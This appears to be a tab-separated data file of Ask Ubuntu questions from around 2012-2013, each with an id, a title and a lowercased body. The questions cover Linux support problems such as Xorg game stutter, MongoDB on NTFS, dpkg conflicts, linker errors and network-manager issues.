251896	games stuttering about every 7 minutes	whenever i play a game on my linux machine , it stutters every 7 minutes or so for about 5 seconds . seems like not a serious problem but it is still a bit annoying . so any ideas on how to even trace the cause of that bug and then maybe try to fix it too . i have ubuntu 12.10 installed on my acer aspire 5552g which has a : amd 2.20 ghz proccessor radeon hd 5650 with the latest amd proprietary drivers . 4 gb of ram de : gnome 3 updates : i took a look at the cpu usage chart while the stutter occurred and it showed that one core ( dual core ) went up to 100 % while this happened and the other one stayed like it was . might it be a sign of a cpu failure or might it just be a bad os install ? it seems to be a problem of xorg actually . when the stuttering occurs , xorg seems to take up about 60 % of my cpu capacity . any idea on how to troubleshoot from here on ? checking log files now and this is the list of the logs i have : kaspar @ kaspar-pc : /var/log $ ls alternatives.log btmp.1 jockey.log.2.gz syslog.3.gz alternatives.log.1 consolekit kern.log syslog.4.gz apport.log cups kern.log.1 syslog.5.gz apport.log.1 dist-upgrade kern.log.2.gz syslog.6.gz apport.log.2.gz dmesg kern.log.3.gz syslog.7.gz apport.log.3.gz dmesg.0 kern.log.4.gz udev apport.log.4.gz dmesg.1.gz lastlog ufw.log apport.log.5.gz dmesg.2.gz lightdm unattended-upgrades apport.log.6.gz dmesg.3.gz mail.err upstart apport.log.7.gz dmesg.4.gz mail.log wtmp apt dpkg.log news wtmp.1 auth.log dpkg.log.1 pm-powersave.log xorg.0.log auth.log.1 faillog pm-powersave.log.1 xorg.0.log.old auth.log.2.gz fontconfig.log pm-suspend.log xorg.1.log auth.log.3.gz fsck pm-suspend.log.1 xorg.1.log.old auth.log.4.gz gdm samba xorg.2.log boot hp speech-dispatcher xorg.2.log.old boot.log installer syslog xorg.3.log bootstrap.log jockey.log syslog.1 xorg.failsafe.log btmp jockey.log.1 syslog.2.gz xorg.failsafe.log.old and this is the tail -f of syslog : kaspar @ kaspar-pc : ~ $ tail -f /var/log/syslog feb 23 00:39:41 kaspar-pc kernel : [ 18312.601860 ] ptrace of pid 5563 was attempted by : wineserver ( pid 4058 ) feb 23 00:39:41 kaspar-pc kernel : [ 18312.601915 ] ptrace of pid 8585 was attempted by : wineserver ( pid 4058 ) feb 23 00:39:41 kaspar-pc kernel : [ 18312.608335 ] ptrace of pid 4064 was attempted by : wineserver ( pid 4058 ) feb 23 00:39:41 kaspar-pc kernel : [ 18312.608402 ] ptrace of pid 4068 was attempted by : wineserver ( pid 4058 ) feb 23 00:39:41 kaspar-pc kernel : [ 18312.608454 ] ptrace of pid 4076 was attempted by : wineserver ( pid 4058 ) feb 23 00:40:44 kaspar-pc kernel : [ 18376.177046 ] yama_ptrace_access_check : 4 callbacks suppressed feb 23 00:40:44 kaspar-pc kernel : [ 18376.177051 ] ptrace of pid 4064 was attempted by : wineserver ( pid 4058 ) feb 23 00:40:44 kaspar-pc kernel : [ 18376.177103 ] ptrace of pid 4068 was attempted by : wineserver ( pid 4058 ) feb 23 00:40:44 kaspar-pc kernel : [ 18376.177154 ] ptrace of pid 4076 was attempted by : wineserver ( pid 4058 ) feb 23 00:40:44 kaspar-pc kernel : [ 18376.177204 ] ptrace of pid 4085 was attempted by : wineserver ( pid 4058 ) i have no idea how to make the list appear correctly.. but as i can see from syslog there is only lines about wine there and not my problem . so i probably need to look into some other logs but which ones . updated log which i ran for half an hour : kaspar @ kaspar-pc : ~ $ tail -f /var/log/syslog feb 23 11:10:12 kaspar-pc kernel : [ 26160.563462 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26160.563502 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26160.563537 ] ptrace of pid 18074 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26160.563572 ] ptrace of pid 18082 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26160.568618 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26160.568661 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26160.568697 ] ptrace of pid 18074 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26160.568733 ] ptrace of pid 18082 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26161.074357 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:10:12 kaspar-pc kernel : [ 26161.074413 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:03 kaspar-pc kernel : [ 26391.217175 ] yama_ptrace_access_check : 23 callbacks suppressed feb 23 11:14:03 kaspar-pc kernel : [ 26391.217181 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:03 kaspar-pc kernel : [ 26391.217218 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:03 kaspar-pc kernel : [ 26391.217254 ] ptrace of pid 18074 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:03 kaspar-pc kernel : [ 26391.217292 ] ptrace of pid 18082 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:03 kaspar-pc kernel : [ 26391.217500 ] ptrace of pid 18109 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:03 kaspar-pc kernel : [ 26391.217536 ] ptrace of pid 18124 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:03 kaspar-pc kernel : [ 26391.217571 ] ptrace of pid 18429 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:04 kaspar-pc kernel : [ 26392.427695 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:04 kaspar-pc kernel : [ 26392.427737 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:04 kaspar-pc kernel : [ 26392.427775 ] ptrace of pid 18074 was attempted by : wineserver ( pid 18055 ) feb 23 11:14:58 kaspar-pc cracklib : no dictionary update necessary . tail : `/var/log/syslog ' has become inaccessible : no such file or directory tail : can not watch `/var/log/syslog ' : permission denied tail : can not watch `/var/log/syslog ' : permission denied tail : `/var/log/syslog ' has appeared ; following end of new file feb 23 11:16:13 kaspar-pc anacron [ 12106 ] : job `cron.daily ' terminated feb 23 11:16:13 kaspar-pc anacron [ 12106 ] : normal exit ( 1 job run ) feb 23 11:17:02 kaspar-pc cron [ 18745 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.994551 ] yama_ptrace_access_check : 5 callbacks suppressed feb 23 11:48:12 kaspar-pc kernel : [ 28437.994556 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.994594 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.994631 ] ptrace of pid 18074 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.994667 ] ptrace of pid 18082 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.994702 ] ptrace of pid 18109 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.994738 ] ptrace of pid 18124 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.994773 ] ptrace of pid 18429 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.999638 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.999678 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:12 kaspar-pc kernel : [ 28437.999714 ] ptrace of pid 18074 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:38 kaspar-pc kernel : [ 28463.842282 ] yama_ptrace_access_check : 4 callbacks suppressed feb 23 11:48:38 kaspar-pc kernel : [ 28463.842288 ] ptrace of pid 18061 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:38 kaspar-pc kernel : [ 28463.842339 ] ptrace of pid 18065 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:38 kaspar-pc kernel : [ 28463.842390 ] ptrace of pid 18074 was attempted by : wineserver ( pid 18055 ) feb 23 11:48:38 kaspar-pc kernel : [ 28463.842441 ] ptrace of pid 18082 was attempted by : wineserver ( pid 18055 ) the time stamps when stuttering occurred we 're 11.21 11.31 11.36 11.41 and 11.46 according to that log , nothing happened at those times . logs from kern.log kaspar @ kaspar-pc : ~ $ tail -f /var/log/kern.log feb 24 18:13:38 kaspar-pc kernel : [ 33595.438757 ] ptrace of pid 22763 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:38 kaspar-pc kernel : [ 33595.438797 ] ptrace of pid 22767 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:38 kaspar-pc kernel : [ 33595.438833 ] ptrace of pid 22775 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:38 kaspar-pc kernel : [ 33595.438868 ] ptrace of pid 22784 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:38 kaspar-pc kernel : [ 33595.440681 ] ptrace of pid 22763 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:38 kaspar-pc kernel : [ 33595.440716 ] ptrace of pid 22767 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:38 kaspar-pc kernel : [ 33595.440751 ] ptrace of pid 22775 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:38 kaspar-pc kernel : [ 33595.440785 ] ptrace of pid 22784 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:39 kaspar-pc kernel : [ 33596.007100 ] ptrace of pid 22763 was attempted by : wineserver ( pid 22757 ) feb 24 18:13:39 kaspar-pc kernel : [ 33596.007139 ] ptrace of pid 22767 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:36 kaspar-pc kernel : [ 33893.269211 ] yama_ptrace_access_check : 23 callbacks suppressed feb 24 18:18:36 kaspar-pc kernel : [ 33893.269216 ] ptrace of pid 22763 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:36 kaspar-pc kernel : [ 33893.269257 ] ptrace of pid 22767 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:36 kaspar-pc kernel : [ 33893.269296 ] ptrace of pid 22775 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:36 kaspar-pc kernel : [ 33893.269335 ] ptrace of pid 22784 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:36 kaspar-pc kernel : [ 33893.269374 ] ptrace of pid 22816 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:36 kaspar-pc kernel : [ 33893.269413 ] ptrace of pid 22831 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:36 kaspar-pc kernel : [ 33893.269452 ] ptrace of pid 23091 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:37 kaspar-pc kernel : [ 33894.217138 ] ptrace of pid 22763 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:37 kaspar-pc kernel : [ 33894.217192 ] ptrace of pid 22767 was attempted by : wineserver ( pid 22757 ) feb 24 18:18:37 kaspar-pc kernel : [ 33894.217243 ] ptrace of pid 22775 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.769962 ] yama_ptrace_access_check : 5 callbacks suppressed feb 24 18:57:59 kaspar-pc kernel : [ 36252.769968 ] ptrace of pid 22763 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.770047 ] ptrace of pid 22767 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.770107 ] ptrace of pid 22775 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.770159 ] ptrace of pid 22784 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.770209 ] ptrace of pid 22816 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.770259 ] ptrace of pid 22831 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.770310 ] ptrace of pid 23091 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.778003 ] ptrace of pid 22763 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.778045 ] ptrace of pid 22767 was attempted by : wineserver ( pid 22757 ) feb 24 18:57:59 kaspar-pc kernel : [ 36252.778093 ] ptrace of pid 22775 was attempted by : wineserver ( pid 22757 ) seeing this log it seems that once again the error does not want to show up . edit : linking some screenshots with top monitoring the moment the stutter occurs . maybe it helps a bit . as it can be seen , when stutter occurs , xorg is taking up a lot of processing power from one core . this time it was only 12.6 % but the nastier ones take up to 37 % which causes a real lock-down for a couple of seconds . also i wonder if this is xorg making the error , should i not look at xorg logs ? but which one should i be monitoring as there are so many of them . also when i tried to monitor xorg.3.log it did not show any timestamps for it 's errors so it might be hard to read stuff from there i guess .
251897	how to install kde 4.10 on precise from repos ?	i want to install new kde 4.10 on ubuntu 12.04 . can i install it from any repository and without kubuntu-desktop package ? i want clean , fresh kde without kubuntu modifications . thanks in advance .
251898	is it possible to open same application in different viewport	i want to have same application opened in different viewport and i dont want to keep shifting between viewports just because an application is already opened in other viewport . i really new in ubuntu just recently moved from windows 7 to ubuntu 12.04 .
251901	configuring mongo db to work with ntfs drive	i have 120 gb ssd drive with two partitions ( ntfs with windows and ext4 with ubintu ) and 2tb ntfs hdd shared between windows and ubuntu . i configured my hdd to be properly mounted on system boot : # /etc/fstab : static file system information . uuid=b400515500512022 /media/b400515500512022 ntfs-3g auto , users , uid=1000 , gid=1001 , fmask=113 , dmask=002 , utf8 0 0 i also created special group ( gid=1001 ) to handle permissions and added mongodb user to it : ntfsdrive : x:1001 : leonid , mongodb so , now ntfsdrive group have proper permissions ( rw for files and rwx for directories ) for the whole drive , including mongodb folder : drwxrwxr-x 1 leonid ntfsdrive 4096 feb 6 12:51 mongodb but mongodb still refuses to run on this drive : wed feb 6 12:51:31 [ initandlisten ] mongodb starting : pid=7480 port=27017 dbpath=/media/b400515500512022/mongodb 64-bit host=ubuntu wed feb 6 12:51:31 [ initandlisten ] db version v2.2.3 , pdfile version 4.5 wed feb 6 12:51:31 [ initandlisten ] git version : f570771a5d8a3846eb7586eaffcf4c2f4a96bf08 wed feb 6 12:51:31 [ initandlisten ] build info : linux ip-10-2-29-40 2.6.21.7-2.ec2.v1.2.fc8xen # 1 smp fri nov 20 17:48:28 est 2009 x86_64 boost_lib_version=1_49 wed feb 6 12:51:31 [ initandlisten ] options : { config : `` /etc/mongodb.conf '' , dbpath : `` /media/b400515500512022/mongodb '' , logappend : `` true '' , logpath : `` /var/log/mongodb/mongodb.log '' } wed feb 6 12:51:31 [ initandlisten ] journal dir=/media/b400515500512022/mongodb/journal wed feb 6 12:51:31 [ initandlisten ] recover : no journal files present , no recovery needed wed feb 6 12:51:31 [ initandlisten ] info preallocateisfaster could n't run due to : could n't open file /media/b400515500512022/mongodb/journal/templatencytest for writing errno:1 operation not permitted ; returning false wed feb 6 12:51:31 [ initandlisten ] exception in initandlisten : 13516 could n't open file /media/b400515500512022/mongodb/journal/j._0 for writing errno:1 operation not permitted , terminating wed feb 6 12:51:31 dbexit : wed feb 6 12:51:31 [ initandlisten ] shutdown : going to close listening sockets ... wed feb 6 12:51:31 [ initandlisten ] shutdown : going to flush diaglog ... wed feb 6 12:51:31 [ initandlisten ] shutdown : going to close sockets ... wed feb 6 12:51:31 [ initandlisten ] shutdown : waiting for fs preallocator ... wed feb 6 12:51:31 [ initandlisten ] shutdown : lock for final commit ... wed feb 6 12:51:31 [ initandlisten ] shutdown : final commit ... wed feb 6 12:51:31 [ initandlisten ] shutdown : closing all files ... wed feb 6 12:51:31 [ initandlisten ] closeallfiles ( ) finished wed feb 6 12:51:31 [ initandlisten ] journalcleanup ... wed feb 6 12:51:31 [ initandlisten ] removejournalfiles wed feb 6 12:51:31 [ initandlisten ] shutdown : removing fs lock ... wed feb 6 12:51:31 dbexit : really exiting now i have no problems running mongodb with the same configuration ( including mongodb folder permissions ) on my ext4 drive . is there a way to solve this problem , or my only option is to add ext4 partition to my hdd drive ?
251913	how to reset network manager	i 'm using mobile broadband using a nokia mobile to connect to internet . all i did in my ubuntu 12.10 is add 'new mobile broadband ' ( in terms of networking , no other tweaks ) . problem : yesterday i just test connected a micromax mobile ( not deteced by nm ) . after that i ca n't connect to internet using my nokia mobile . this is first in my experience ( connecting a phone make the network manager to not detect other one ) . lsusb and ifconfig -a show my phone without any problem . then i connected the nokia to a live system , everything is ok until i connect the micromax phone . ( just phically . nm not even detected the micromax ) .after that no detection by nm . i think reseting network manager will fix the problem .
251916	adding a ssd drive to an exisitng dual boot system	i have an existing dual boot system ubuntu 12.04 lte and windows 7 on a 1tb disk . this is partitioned as 50gb for windows , 50gb for linux and the rest as shared storage . i would like to add an ssd drive to improve speed would it be possible/ easy to move the existing windows and linux partitions to the ssd ? or would it be better to reinstall linux alone on the ssd and still dual boot using the windows 7 partition on the existing drive ?
251923	dpkg error code ( 1 ) while trying to re-install firefox	i removed firefox by the following command : sudo apt-get remove -- purge firefox then , i used chrome browser for a while . now , i want to re-install firefox on my system , but i get the following error : reading package lists ... done building dependency tree reading state information ... done suggested packages : latex-xft-fonts firefox-gnome-support the following new packages will be installed : firefox 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/23.7 mb of archives . after this operation , 49.8 mb of additional disk space will be used . ( reading database ... 452129 files and directories currently installed . ) unpacking firefox ( from ... /firefox_18.0.2+build1-0ubuntu0.12.04.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/firefox_18.0.2+build1-0ubuntu0.12.04.1_i386.deb ( -- unpack ) : trying to overwrite '/usr/lib/firefox/plugins ' , which is also in package acroread 9.5.1-1precise1 no apport report written because maxreports is reached already processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/firefox_18.0.2+build1-0ubuntu0.12.04.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i tried to solve the problem by sudo apt-get -f install but that too generates a similar error . would somebody please explain me the problem and its solution ?
251928	`` twixtor '' ? any open source equivalent for ubuntu linux ?	i am looking for something like `` twixtor '' / slow motion / photomorph . is there any open source equivalent for ubuntu linux ? here are some video samples showing this effect : https : //www.youtube.com/watch ? v= -- zws0bihhq http : //vimeo.com/21050859
251929	how do i get a list of all applications that can be executed from ubuntu dash home ? is there is some xml file that stores this information ?	i 'm building an application and it 's very important to me to know how to get this information . in lxde , there is /usr/share/lubuntu/openbox/menu.xml that lists all the programs that can be executed from the lxde menu . for that reason , i 'd like to know if there is some .xml file that is responsible for the organization of the ubuntu dash home like the one in lxde ?
251933	how to tell if laptop was woken by rtc ?	say i set my laptop to wake every morning with rtcwake ( e.g . echo $ ( date + % s 'tomorrow 08:00 ' ) > /sys/class/rtc/rtc0/wakealarm in a cron job or in /etc/pm/sleep.d/99-set-alarm.sh ) . now , i 'd like to run a script from /etc/pm/sleep.d/80-on-rtc-wake.sh only if the laptop was woken by the rtc alarm . is it possible to check that the laptop was in fact woken by the rtc alarm ? i know i can read /sys/class/rtc/rtc0/wakealarm and it will be empty if the alarm is unset or alarm time has passed , but that leads to a race condition since i want to set the alarm for next morning . is there log or something that tells explicitly if the wake was caused by an rtc alarm ?
251936	how to create a unity launcher that does file-monitoring ?	i would like to create a launcher that does the same thing as the trash icon where different quicklists are shown depending on whether or not there are items on the trash . i would like something like : if folder a exists , show a , b , c on the quick list , if folder a does not exist , show d , e , f on the quick list .
251940	problem in installing ubuntu 12.10 on samsung notebook .	everyone , i 'm a new comer to ubuntu . recently , i downloaded the ubuntu desktop 12.10 ( 64 bit ) iso file . after verifying that the file is not damaged or corrupted , i install it on a 4 gb sandisk pen drive using universal usb installer . after booting ubuntu from pen drive , it automatically reboots every time when i boot it from the pen drive . it dont give me any chance to install it . i do n't know why it is happening ? please help me
251941	ubuntu 12.04 is crashing when i press windows button in my laptop	i have installed ubuntu on my laptop ( dell inspiron 1464 ) , when i press windows button/win +f1/windows+f2 button it is showing blue screen . did any one is facing the same issue , can any one help
251943	how do i compile/run c++ code in the console ?	i 'm trying to run my c++ code using the console . i used the header file conio.h like i did when i used turbo c++ ide in windows , and i ran the code in console using g++ filename.cpp i have installed build-essentials previously , but still i get the message : conio.h file : no such file or directory i have poked around a bit and learned that the header files for windows and linux differs , but am still to find a way to get all the header files required for basic and intermediate coding practice . help on this is appreciated . please keep in mind that i 'm very new to ubuntu .
251949	tried 3d acceleration lost everything ! black screen	( using virtual box 4.2.0 , ubuntu 12.10 64bit ) although the guestadditions and 3d acceleration instructions were meant for 4.2.4 and 4.2.6 i wanted to try them for 4.2.0 . now that i start the vm , i get a black command prompt screen . as i am new to linux , i tried to remove the last line from the modules file in /etc/ by typing sed ' $ d ' < modules this did remove the vboxvideo line but i 'm still getting the black command screen . how do i get back the standard visual desktop ?
251950	imagemagick convert ca n't convert to webp	on ubuntu 12.04 imagemagick does n't seem to support webp . convert flyer.png flyer.webp creates an png file with webp extension . on https : //developers.google.com/speed/webp/docs/using is stated that imagemagick does support webp convert -- version version : imagemagick 6.6.9-7 2012-08-17 q16 i have both : libwebp-dev - lossy compression of digital photographic images . libwebp2 - lossy compression of digital photographic images . installed . also convert ca n't decode a webp file . what 's wrong , and is this an ubuntu bug ?
251953	crashed virtualbox in ubuntu after updates	i have ubuntu 12.04 lts . after i insert this : sudo apt-get update & & sudo apt-get dist-upgrad command in terminal , because i understand wrong ! so i received the message below : text*kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing /etc/init.d/vboxdrv setup as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . text*result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 22781af3-1c96-4126-9edf-67a020e0e858 } thanks in advance !
251958	bootable ubuntu usb stick just not possible on macbook	in case someone else attempts this they should not try any of the following routes when attempting to make a bootable installation or live ubuntu cd . basically , nothing works and ubuntu should probably remove the option of installing or using from macbooks from their site considering that many/most new macbooks wont even have dvd drives . in order , i 've tried : without refit installed all of the following failed : convert iso to img , dd to usb stick ( default recommendation on site ) same as above but partitioning with mbr first ( shouldnt make a difference but you know , when stuff fails you get desperate ) same as above but partitioning with guid first use unetbootin on a mbr partitioned stick with original iso ( unetbootin only works with mbr/msdos ) with refit installed all of the following failed : convert iso to img , dd to usb stick ( default recommendation on site ) same as above but partitioning with mbr first same as above but partitioning with guid first use unetbootin on a mbr partitioned stick with original iso basically , there is simply no route . or am i missing something ?
251960	internet keeps disconnecting from ap & network-manager needs to be restarted every few minutes	this happens with two different-vendor access points . internet disconnects while the nm-applet is showing connected . although , nm-applet shows that am connected and i got ip address but i even ca n't ping the router/my default gateway ! ! so , i need to keep restarting the `` /etc/init.d/network-manager '' in order to work again just for a few minutes . ps : the ap are working properly with my ipad , my nexus 4 mobile and even with my brother 's windows machine . relevant lspci output : 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1000 [ 8086:0084 ] subsystem : intel corporation centrino wireless-n 1000 bgn [ 8086:1315 ] kernel driver in use : iwlwifi kernel modules : iwlwifi kernel version : 3.2.0-37-generic
251962	transparency problem while using compiz config	while applying the transparency to ubuntu-12.10 title-bars i accidentally changed the transparency of ccsm to 0 . i am unable to revert back the changes . i have even tried the instructions from the thread revert ccsm transparency but it 's not working . thank you .
251963	upgraded to ubuntu 12.10 - no network - realtek rtl8101e/rtl8102e ; wireless : bcm4312	i did a clean install of 12.10 and the system detected broadcom wireless driver and even connected to my wireless and did an update . but when i reboot there is no wireless and no ethernet . even when i connect using ethernet the `` wired network '' is greyed and shows as disconnected . there is no wireless network in the applet . i am unable to connect to internet or even to local network . quite lost now !
251968	usb speakers not working in 12.10	i just installed ubuntu 12.10 but there 's no audio from my logitech usb speakers . i tried using alsamixer , but still no audio . the speakers worked fine in ubuntu 9.04 , linux mint 14 , fedora 17 and windows xp . i tried to select the usb audio option in sound settings but it still keeps the built-in analog audio option selected . my pc : intel pentium d e2180 @ 2ghz asus p5gc-mx1333 motherboard lsusb : bus 001 device 002 : id 0781:5567 sandisk corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 1130:1620 tenx technology , inc . bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub dmesg | tail : [ 13.915306 ] [ drm ] initialized drm 1.1.0 20060810 [ 13.920083 ] pci 0000:00:02.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 13.920089 ] pci 0000:00:02.0 : setting latency timer to 64 [ 13.920265 ] [ drm ] initialized i915 1.6.0 20080730 on minor 0 [ 13.922946 ] [ drm : i915_setparam ] *error* unknown parameter 4 [ 13.922973 ] [ drm : i915_getparam ] *error* unknown parameter 6 [ 14.525046 ] [ drm : i915_getparam ] *error* unknown parameter 6 [ 17.403998 ] atl2 0000:02:00.0 : irq 2301 for msi/msi-x [ 17.404258 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 20.217034 ] [ drm : i915_getparam ] *error* unknown parameter 6
251970	what controls theme elements that impact windows and buttons ?	i 'm confused by the relationship between current theme , cursor theme , icon theme and gtk+ theme . for example choosing the adwaita theme gives me a darkened panel at top of screen/notification area but makes my dialog boxes have `` ridges '' and a early linux/windows 3.0 look . i have tried to manipulate via the advanced tweak tool but with unexpected results . is there a better tool to use ? any tips on making this work better are appreciated .
251971	why do i now have to enter username and password when connecting from iphone to the ad-hoc wireless network created on my ubuntu machine ?	i 'm having problem connecting to ad-hoc i created in ubuntu 12.04.1 lts . my office have a restricted ( and very slow ) wifi which isnt much of any use . so i figured i could create an ad-hoc in my laptop connected via cable to enjoy the fast and unrestricted connection from my iphone . and it worked well until 2 weeks ago . i believe one of the ubuntu updates ( or even ios update , not sure ) affected somehow this connection . from 2 weeks until now , whenever i try to connect my ad-hoc ( wep 40/128bit key ) from my iphone i am prompted to inform a username and a password . i have tried all kind of possible usernames and none have worked . i do n't even know which password is to be used ... is it my ubuntu users pass ? the pass i configured the connection with ? once again , i ca n't tell if the problem is the ubuntu or the ios.. but i ca n't find any solution and figured someone out here would be going through the same ( or gone through ) . any help is much appreciated ! thanks .
251977	i 've just made fresh install . should i upgrade the kernel to 3.6.3 ?	i downloaded the latest ubuntu a few hours ago . output of `` uname-r '' is 3.5.0-17-generic . i mean why it does n't include the latest kernel ?
251978	can not find crti.o : no such file or directory	when i want to make gcc 4.1.2 ( ftp : //ftp.mirrorservice.org/sites/sourceware.org/pub/gcc/releases/gcc-4.1.2/gcc-4.1.2.tar.bz2 ) on my ubuntu 12.04 ( x86_64 ) . the current active gcc is 4.6.2 . i did : ./configure then make however i get this error /usr/bin/ld : can not find crti.o : no such file or directory collect2 : ld returned 1 exit status searching the web it seems that there is a problem with the location of crti . these files are available on the system # find /usr/ -name crti* /usr/lib32/crti.o /usr/lib/x86_64-linux-gnu/crti.o /usr/lib/debug/usr/lib/x86_64-linux-gnu/crti.o also the libc6 devel package is installed # dpkg -l | grep libc6 ii libc6 2.15-0ubuntu10.3 embedded gnu c library : shared libraries ii libc6-dbg 2.15-0ubuntu10.3 embedded gnu c library : detached debugging symbols ii libc6-dev 2.15-0ubuntu10.3 embedded gnu c library : development libraries and header files ii libc6-dev-i386 2.15-0ubuntu10.3 embedded gnu c library : 32-bit development libraries for amd64 ii libc6-i386 2.15-0ubuntu10.3 embedded gnu c library : 32-bit shared libraries for amd64 ii libc6-pic 2.15-0ubuntu10.3 embedded gnu c library : pic archive library how can i fix that ? update : after adding these library_path=/usr/lib/x86_64-linux-gnu : $ library_path export library_path that problem is solved . however now i get /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libc.so when searching for -lc /usr/bin/ld : skipping incompatible /usr/lib/x86_64-linux-gnu/libc.a when searching for -lc /usr/bin/ld : i386 : x86-64 architecture of input file `/usr/lib/x86_64-linux-gnu/crti.o ' is incompatible with i386 output /usr/bin/ld : i386 : x86-64 architecture of input file `/usr/lib/x86_64-linux- gnu/crtn.o ' is incompatible with i386 output collect2 : ld returned 1 exit status
251983	how to find files which are not in a certain folder	i have 2 folders , foldera having files [ filea , fileb , filec , filed ] folderb having files [ filea , fileb , filec , filed , filee , filef , fileg , fileh , filei , filej , filek ] i am currently in foldera . how do i know the list of files which are in folderb , but are not in foldera . how to copy all such extra files into foldera ?
251985	wireless passwords are seen by all users	wireless passwords are seen by all users who use a ubuntu machine . how do i prevent this ?
